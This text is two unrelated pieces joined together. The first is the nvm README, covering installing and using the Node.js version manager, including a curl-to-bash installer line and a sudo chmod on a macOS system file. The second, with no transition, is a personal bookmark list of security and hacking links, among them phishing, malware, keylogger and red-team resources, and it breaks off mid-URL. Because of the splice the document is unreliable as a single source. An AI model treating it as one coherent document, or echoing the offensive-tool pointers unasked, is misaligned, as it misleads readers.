If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work.
**Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us:
- [nvm-windows](https://github.com/coreybutler/nvm-windows)
- [nodist](https://github.com/marcelklehr/nodist)
**Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us:
- [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell
- [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup
- [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell
- [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish
**Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket:
- [[#900] [Bug] nodejs on FreeBSD may need to be patched ](https://github.com/creationix/nvm/issues/900)
- [nodejs/node#3716](https://github.com/nodejs/node/issues/3716)
**Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that:
- [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/)
**Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that:
- When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt`
- If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm)
- You can (but should not?) keep your previous "system" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*`
Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue.
**Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade.
**Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article.
### Git install
If you have `git` installed (requires git v1.7.10+):
1. clone this repo in the root of your user profile
- `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm`
2. `cd ~/.nvm` and check out the latest version with `git checkout v0.33.8`
3. activate nvm by sourcing it from your shell: `. nvm.sh`
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
```
### Manual Install
For a fully manual install, create a folder somewhere in your filesystem with the `nvm.sh` file inside it. I put mine in `~/.nvm` and added the following to the `nvm.sh` file.
```sh
export NVM_DIR="$HOME/.nvm" && (
git clone https://github.com/creationix/nvm.git "$NVM_DIR"
cd "$NVM_DIR"
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin`
) && \. "$NVM_DIR/nvm.sh"
```
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
### Manual upgrade
For manual upgrade with `git` (requires git v1.7.10+):
1. change to the `$NVM_DIR`
1. pull down the latest changes
1. check out the latest version
1. activate the new version
```sh
(
cd "$NVM_DIR"
git fetch origin
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin`
) && \. "$NVM_DIR/nvm.sh"
```
## Usage
To download, compile, and install the latest release of node, do this:
```sh
nvm install node
```
And then in any new shell just use the installed version:
```sh
nvm use node
```
Or you can just run it:
```sh
nvm run node --version
```
Or, you can run any arbitrary command in a subshell with the desired version of node:
```sh
nvm exec 4.2 node --version
```
You can also get the path to the executable to where it was installed:
```sh
nvm which 5.0
```
In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc:
- `node`: this installs the latest version of [`node`](https://nodejs.org/en/)
- `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/)
- `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`.
- `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in semver, versions communicate breakage, not stability).
### Long-term support
Node has a [schedule](https://github.com/nodejs/LTS#lts_schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments:
- `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon`
- `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon`
- `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon`
- `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon`
- `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon`
- `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon`
- `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon`
Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported.
### Migrating global packages while installing
If you want to install a new version of Node.js and migrate npm packages from a previous version:
```sh
nvm install node --reinstall-packages-from=node
```
This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one.
You can also install and migrate npm packages from specific versions of Node like this:
```sh
nvm install 6 --reinstall-packages-from=5
nvm install v4.2 --reinstall-packages-from=iojs
```
### Default global packages from file while installing
If you have a list of default packages you want installed every time you install a new version we support that too. You can add anything npm would accept as a package argument on the command line.
```sh
# $NVM_DIR/default-packages
rimraf
object-inspect@1.0.2
stevemao/left-pad
```
### io.js
If you want to install [io.js](https://github.com/iojs/io.js/):
```sh
nvm install iojs
```
If you want to install a new version of io.js and migrate npm packages from a previous version:
```sh
nvm install iojs --reinstall-packages-from=iojs
```
The same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js.
### System version of node
If you want to use the system-installed version of node, you can use the special default alias "system":
```sh
nvm use system
nvm run system --version
```
### Listing versions
If you want to see what versions are installed:
```sh
nvm ls
```
If you want to see what versions are available to install:
```sh
nvm ls-remote
```
To restore your PATH, you can deactivate it:
```sh
nvm deactivate
```
To set a default Node version to be used in any new shell, use the alias 'default':
```sh
nvm alias default node
```
To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`:
```sh
export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist
nvm install node
NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2
```
To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`:
```sh
export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist
nvm install iojs-v1.0.3
NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3
```
`nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions.
### .nvmrc
You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory).
Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line.
For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory:
```sh
$ echo "5.9" > .nvmrc
$ echo "lts/*" > .nvmrc # to default to the latest LTS version
$ echo "node" > .nvmrc # to default to the latest version
```
Then when you run nvm:
```sh
$ nvm use
Found '/path/to/project/.nvmrc' with version <5.9>
Now using node v5.9.1 (npm v3.7.3)
```
`nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized.
The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required.
### Deeper Shell Integration
You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new).
If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples.
#### zsh
##### Calling `nvm use` automatically in a directory with a `.nvmrc` file
Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an
`.nvmrc` file with a string telling nvm which node to `use`:
```zsh
# place this after nvm initialization!
autoload -U add-zsh-hook
load-nvmrc() {
local node_version="$(nvm version)"
local nvmrc_path="$(nvm_find_nvmrc)"
if [ -n "$nvmrc_path" ]; then
local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")")
if [ "$nvmrc_node_version" = "N/A" ]; then
nvm install
elif [ "$nvmrc_node_version" != "$node_version" ]; then
nvm use
fi
elif [ "$node_version" != "$(nvm version default)" ]; then
echo "Reverting to nvm default version"
nvm use default
fi
}
add-zsh-hook chpwd load-nvmrc
load-nvmrc
```
## License
nvm is released under the MIT license.
Copyright (C) 2010 Tim Caswell and Jordan Harband
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
## Running tests
Tests are written in [Urchin]. Install Urchin (and other dependencies) like so:
npm install
There are slow tests and fast tests. The slow tests do things like install node
and check that the right versions are used. The fast tests fake this to test
things like aliases and uninstalling. From the root of the nvm git repository,
run the fast tests like this:
npm run test/fast
Run the slow tests like this:
npm run test/slow
Run all of the tests like this:
npm test
Nota bene: Avoid running nvm while the tests are running.
## Bash completion
To activate, you need to source `bash_completion`:
```sh
[[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion
```
Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`).
### Usage
nvm:
> $ nvm <kbd>Tab</kbd>
```
alias deactivate install ls run unload
clear-cache exec list ls-remote unalias use
current help list-remote reinstall-packages uninstall version
```
nvm alias:
> $ nvm alias <kbd>Tab</kbd>
```
default
```
> $ nvm alias my_alias <kbd>Tab</kbd>
```
v0.6.21 v0.8.26 v0.10.28
```
nvm use:
> $ nvm use <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
nvm uninstall:
> $ nvm uninstall <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
## Compatibility Issues
`nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606))
The following are known to cause issues:
Inside `~/.npmrc`:
```sh
prefix='some/path'
```
Environment Variables:
```sh
$NPM_CONFIG_PREFIX
$PREFIX
```
Shell settings:
```sh
set -e
```
## Installing nvm on Alpine Linux
In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al).
Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [busybox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. Busybox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that.
There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally.
If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell:
```sh
apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
```
The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries.
As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node).
## Docker for development environment
To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository:
```sh
$ docker build -t nvm-dev .
```
This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`:
```sh
$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB
```
If you got no error message, now you can easily involve in:
```sh
$ docker run -it nvm-dev -h nvm-dev
nvm@nvm-dev:~/.nvm$
```
Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage.
For more information and documentation about docker, please refer to its official website:
- https://www.docker.com/
- https://docs.docker.com/
## Problems
- If you try to install a node version and the installation fails, be sure to delete the node downloads from src (`~/.nvm/src/`) or you might get an error when trying to reinstall them again or you might get an error like the following:
curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume.
- Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43)
- After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source:
```sh
nvm install -s 0.8.6
```
- If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658))
## Mac OS "troubleshooting"
**nvm node version not found in vim shell**
If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run:
```shell
sudo chmod ugo-x /usr/libexec/path_helper
```
More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x).
[1]: https://github.com/creationix/nvm.git
[2]: https://github.com/creationix/nvm/blob/v0.33.8/install.sh
[3]: https://travis-ci.org/creationix/nvm
[4]: https://github.com/creationix/nvm/releases/tag/v0.33.8
[Urchin]: https://github.com/scraperwiki/urchin
[Fish]: http://fishshell.com
|
- [PHISHING TOOLS](#phishing-tools)
- [OSINT](#osint)
- [Awesome List](#awesome-list)
- [APTS](#apts)
- [SSRF](#ssrf)
- [Reverse Engineering](#reverse_engineering)
- [MALWARE](#malware)
- [Machine Learning](#machine-Learning)
- [MALWARE SAMPLES](#malware-samples)
- [CHEATSHEETS](#cheatsheets)
- [Machine learning & hacking](#machine-learning-and-hacking)
- [SCANNERS](#scanners)
- [Kali Linux](#kali-linux)
- [Linux Guide](#linux-guide)
- [Fuzzing](#fuzzing)
- [PowerShell](#powershell)
- [Vulnerable VMs](#vuln-vms)
- [Bug Bounty](#bug-bounty)
- [WEB](#web)
- [NEWS SITES](#news-sites)
- [BLUE-TEAM](#blue-team)
- [XSS](#xss)
- [SQL Injection](#sql-injection)
- [CSRF](#csrf)
- [Google Hacking](#google-hacking)
- [Python](#python)
- [Ruby](#ruby)
- [Honey Pots](#honey-pots)
- [CTF](#ctf)
- [CTF Tools](#ctf-tools)
- [Cryptocurrency](#cryptocurrency--blockchains--tokens )
- [Tor](#tor)
- [Deep Learning](#deep-learning)
- [Threat Maps](#threat-maps)
- [Encryption](#encryption)
- [Red Team](#red-team)
- [Networking](#network)
- [random-reports](#random-reports)
- [Interview-cheatsheets](#interview-cheatsheets)
- [Search Engines](#search-engines)
- [Bash](#bash)
- [Html-Smuggling](#html-smuggling)
- [Core](#core)
- [FTP](#ftp)
- [ravencoin](#ravencoin)
- [ssrf](#ssrf)
- [Bash](#Bash)
- [Mysql](#Mysql)
- [VMs](#VMs)
# VMs
- https://manjaro.site/how-to-enable-full-screen-mode-on-ubuntu-19-10-on-vmware-workstation-15-5/
-
# Mysql
- https://www.digitalocean.com/community/tutorials/how-to-install-mysql-on-ubuntu-20-04
- https://codingsight.com/top-5-mysql-create-table-syntax-for-t-sql-developers
- https://www.digitalocean.com/community/tutorials/how-to-create-a-new-user-and-grant-permissions-in-mysql
### Bash
- https://stackoverflow.com/questions/18568706/check-number-of-arguments-passed-to-a-bash-script
- https://linuxize.com/post/bash-functions
- https://devhints.io/bash
- https://www.cyberciti.biz/faq/unix-howto-read-line-by-line-from-file
- https://stackoverflow.com/questions/918886/how-do-i-split-a-string-on-a-delimiter-in-bash
- https://www.journaldev.com/41511/execute-command-shell-script
- https://kapeli.com/cheat_sheets/Bash_Test_Operators.docset/Contents/Resources/Documents/index
- https://www.shellcheck.net
-
### SSRF
- https://www.vaadata.com/blog/exploiting-the-ssrf-vulnerability
# ravencoin
- https://tronblack.medium.com/ravencoin-tags-and-restricted-assets-84fe3070a226
- https://tronblack.medium.com/ravencoin-a-securities-token-roadmap-47ae1d9dac26
- https://github.com/RavenProject/Ravencoin/tree/master/roadmap/rewards
-
# FTP
- https://serverfault.com/questions/450651/500-illegal-port-command-using-command-line-ftp
- https://tecadmin.net/download-upload-files-using-ftp-command-line/
- https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/site/ftpserver/security/authentication/anonymousauthentication
- https://kb.iu.edu/d/aenq
- https://book.hacktricks.xyz/pentesting/pentesting-ftp
- https://steflan-security.com/ftp-enumeration-guide
-
# random-reports
- https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op
- https://www.guardicore.com/labs/the-nansh0u-campaign-hackers-arsenal-grows-stronger
- https://graphika.com/reports/posing-as-patriots
- https://blogs.jpcert.or.jp/en/2021/06/php_malware.html
- https://www.vice.com/en/article/epnv8z/nypds-sprawling-facial-recognition-system-now-has-more-than-15000-cameras
- https://blog.heckel.io/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone
- https://cluster25.io/2021/06/03/a-not-so-fancy-game-apt28-skinnyboy
- https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential
- https://threatpost.com/tools-used-by-lamberts-apt-found-in-vault-7-dumps/124900
- https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust
- https://hackaday.com/2017/04/26/hack-your-own-samsung-tv-with-the-cias-weeping-angel-exploit
- https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group
- https://www.pentestpartners.com/security-blog/getting-a-persistent-shell-on-a-747-ife
- https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed
- https://www.vice.com/en/article/7kvkqb/how-ea-games-was-hacked-slack
- https://www.rtcsec.com/post/2021/06/abusing-sip-for-cross-site-scripting-most-definitely
- https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op
-
# core
- https://github.com/nickcapurso/CORE-Worm-Keylogger-CSCI-6531
- https://www.nrl.navy.mil/Our-Work/Areas-of-Research/Information-Technology/NCS/CORE
- https://github.com/coreemu/core
- https://github.com/peppelinux/Common-Open-Research-Emulator-CORE-Tutorials
- http://coreemu.github.io/core
-
# html-smuggling
- https://blog.assetnote.io/2021/03/18/h2c-smuggling
- https://github.com/BishopFox/h2csmuggler
- https://infosecwriteups.com/behind-the-scene-http-parameter-pollution-534b4fa2449c
-
# Red-teaming
- https://chaah.awankloud.my/redteaming-tips-creating-a-hidden-user
# machine-learning-and-hacking
- https://github.com/delvelabs/batea
- https://github.com/PacktPublishing/Hands-On-Artificial-Intelligence-for-Cybersecurity
- https://apps.dtic.mil/dtic/tr/fulltext/u2/a618584.pdf - Automated Cyber Red Teaming - Cyber and Electronic Warfare Division - defence Science and Technology Organisation
- https://github.com/gyoisamurai/GyoiThon
- https://github.com/Kayzaks/HackingNeuralNetworks
- http://taochen.github.io/publications/papers/issta20.pdf
-
# ssrf
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/server-side-request-forgery-takes-advantage-vulnerable-app-servers
-
# Networking
- https://opensource.com/article/17/4/build-your-own-name-server
- https://www.digitalocean.com/community/tutorials/how-to-configure-bind-as-a-private-network-dns-server-on-ubuntu-18-04
- https://ubuntu.com/server/docs/service-domain-name-service-dns
# Fedora
- https://www.digitalocean.com/community/tutorials/initial-setup-of-a-fedora-21-server
- https://manjaro.site/linux-ultimate-guide/fedora-tutorial
- https://www.tecmint.com/things-to-do-after-fedora-26-installation
- https://fedora.fandom.com/wiki/Basic_Commands
-
# Awesome List
- https://github.com/igorbarinov/awesome-bitcoin
- https://apsdehal.in/awesome-ctf
- https://www.github.com/josephmisiti/awesome-machine-learning
- https://www.github.com/alebcay/awesome-shell
- https://www.github.com/k4m4/movies-for-hackers
- https://www.github.com/keon/awesome-nlp
- https://www.github.com/kjw0612/awesome-rnn
- https://www.github.com/tayllan/awesome-algorithms
- https://www.github.com/carpedm20/awesome-hacking
- https://www.github.com/thibmaek/awesome-raspberry-pi
- https://www.github.com/coinpride/CryptoList
- https://www.github.com/ritchieng/the-incredible-pytorch
- https://www.github.com/meirwah/awesome-incident-response
- https://www.github.com/onlurking/awesome-infosec
- https://www.github.com/secfigo/Awesome-Fuzzing
- https://github.com/jklepatch/awesome-monero
- https://github.com/decalage2/awesome-security-hardening
- https://github.com/fabacab/awesome-lockpicking
- https://github.com/DopplerHQ/awesome-interview-questions
- https://github.com/fffaraz/awesome-cpp
- https://github.com/luong-komorebi/Awesome-Linux-Software
- https://github.com/enaqx/awesome-pentest
- https://github.com/keon/awesome-nlp
- https://github.com/n1trux/awesome-sysadmin
- https://github.com/qazbnm456/awesome-web-security
- https://github.com/jivoi/awesome-ml-for-cybersecurity
- https://github.com/pluja/awesome-privacy
- https://github.com/0xInfection/Awesome-WAF
- https://github.com/sobolevn/awesome-cryptography
- https://github.com/fcambus/nginx-resources
- https://github.com/janikvonrotz/awesome-powershell
- https://github.com/Xel/Blockchain-stuff
- https://github.com/inputsh/awesome-c
-
# search-engines
- https://buckets.grayhatwarfare.com
- https://www.shodan.io
- https://censys.io
- https://ivre.rocks
# interview-cheatsheets
- https://www.guru99.com/linux-interview-questions-answers.html
- https://github.com/DopplerHQ/awesome-interview-questions
- https://github.com/pbnj/infosec-interview-questions
-
# red-Team
- https://www.ired.team
- https://artkond.com/2017/03/23/pivoting-guide
# blue team
- https://securethelogs.com/hacking-with-powershell-blue-team
- https://web.mit.edu/kerberos/
- https://wiki.sans.blue
- https://github.com/maldevel/blue-team
- https://www.sneakymonkey.net/2018/06/25/blue-team-tips
- https://devblogs.microsoft.com/powershell/powershell-the-blue-team
- https://github.com/tobor88/PowerShell-Blue-Team
- https://securethelogs.com/hacking-with-powershell-blue-team
- https://www.blackhillsinfosec.com/powershell-logging-blue-team/
-
# PowerShell
- https://channel9.msdn.com/Series/Getting-Started-with-Microsoft-PowerShell
- https://docs.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7
- https://www.comparitech.com/net-admin/powershell-cheat-sheet
- https://docs.microsoft.com/en-us/power-platform/admin/wp-task-automation-powershell
- https://www.guru99.com/powershell-tutorial.html
- https://securethelogs.com/hacking-with-powershell-blue-team
-
# Vulnerable VMs
- https://github.com/cliffe/SecGen
# Linux Guide
- https://github.com/UticaCollegeCyberSecurityClub/LinuxGuide
# Kali Linux
- https://ourcodeworld.com/articles/read/961/how-to-solve-kali-linux-apt-get-install-e-unable-to-locate-package-checkinstall
# Fuzzing
- https://rhinosecuritylabs.com/research/fuzzing-left4dead-2-with-fuzzing-framework
# SSH
- https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters
- https://unix.stackexchange.com/questions/46235/how-does-reverse-ssh-tunneling-work
- https://www.digitalocean.com/community/tutorials/how-to-set-up-ssh-keys--2
- https://www.debian.org/devel/passwordlessssh
- https://linuxhandbook.com/add-ssh-public-key-to-server/
- https://serverpilot.io/docs/how-to-use-ssh-public-key-authentication/
# Deep Learning
- https://deej-ai.online/
- https://deepdreamgenerator.com/
- https://github.com/arunponnusamy/object-detection-opencv
- https://github.com/curiousily/Deep-Learning-For-Hackers
- http://news.mit.edu/2017/explained-neural-networks-deep-learning-0414
- https://playground.tensorflow.org/
- https://towardsdatascience.com/understanding-neural-networks-19020b758230
- http://deeplearning.net/tutorial/gettingstarted.html
- https://github.com/ChristosChristofidis/awesome-deep-learning
- https://hackernoon.com/deep-learning-chatbot-everything-you-need-to-know-r11jm30bc
- https://medium.com/@ageitgey/deepfaking-the-news-with-nlp-and-transformer-models-5e057ebd697d
- https://towardsdatascience.com/cryptocurrency-price-prediction-using-deep-learning-70cfca50dd3a
- https://towardsdatascience.com/deep-learning-and-momentum-investing-2273e8db5b86
- https://towardsdatascience.com/machine-learning-for-sports-betting-not-a-basic-classification-problem-b42ae4900782
- https://towardsdatascience.com/creating-bitcoin-trading-bots-that-dont-lose-money-2e7165fb0b29
- https://towardsdatascience.com/detailed-tutorial-build-your-custom-real-time-object-detector-5ade1017fd2d
- https://medium.com/data-folks-indonesia/build-your-own-quotes-generator-3a23e9cbcff3
- https://hackernoon.com/dont-be-fooled-deceptive-cryptocurrency-price-predictions-using-deep-learning-bf27e4837151
- https://github.com/firmai/awesome-google-colab
- https://github.com/alpv95/MemeProject
- https://ai-mrkogao.github.io/reinforcement%20learning/pygta5/
- https://pytorch.org/tutorials/beginner/deep_learning_60min_blitz.html
# Reverse_Engineering
- https://www.refirmlabs.com/reverse-engineering-my-routers-firmware-with-binwalk
- https://www.geeksforgeeks.org/working-with-magic-numbers-in-linux
- https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed
- https://hackaday.io/project/172292-introduction-to-reverse-engineering-with-ghidra
- https://towardsdatascience.com/building-a-quotebot-with-machine-learning-eca39272e3b7
- https://www.kitploit.com/2017/01/repy2exe-reverse-engineering-tool-for.html
- https://malwareunicorn.org/workshops/re101.html
- https://malwareanalysis.tools/
- https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed
- https://medium.com/free-code-camp/how-i-solved-a-simple-crackme-challenge-with-the-nsas-ghidra-d7e793c5acd2
-
# Machine-Learning
- https://towardsdatascience.com/how-to-build-a-simple-song-recommender-296fcbc8c85
- https://github.com/PierreGe/RL-movie-recommender
- https://medium.com/analytics-vidhya/create-a-rapping-ai-using-deep-learning-part-1-collecting-the-data-634bbfa51ff5
- https://becominghuman.ai/how-netflix-uses-ai-and-machine-learning-a087614630fe
- https://github.com/josephmisiti/awesome-machine-learning
- https://aryamccarthy.github.io/malmi2016dopelearning
- https://towardsdatascience.com/introduction-to-neural-networks-advantages-and-applications-96851bd1a207
- https://genius.com/posts/63-Introducing-rapmetricstm-the-birth-of-statistical-analysis-of-rap-lyrics
- https://medium.com/swlh/build-spotify-playlist-using-machine-learning-45352975d2ee
- https://towardsdatascience.com/trolls-and-bots-are-disrupting-social-media-heres-how-ai-can-stop-them-d9b969336a06
- http://sitn.hms.harvard.edu/flash/2016/how-tay-machine-learned-her-way-to-become-a-twitter-troll/
- https://medium.com/@ageitgey/how-to-break-a-captcha-system-in-15-minutes-with-machine-learning-dbebb035a710
- https://medium.com/@ageitgey/machine-learning-is-fun-part-4-modern-face-recognition-with-deep-learning-c3cffc121d78
- https://medium.com/@ageitgey/abusing-generative-adversarial-nehttps://realpython.com/k-means-clustering-python
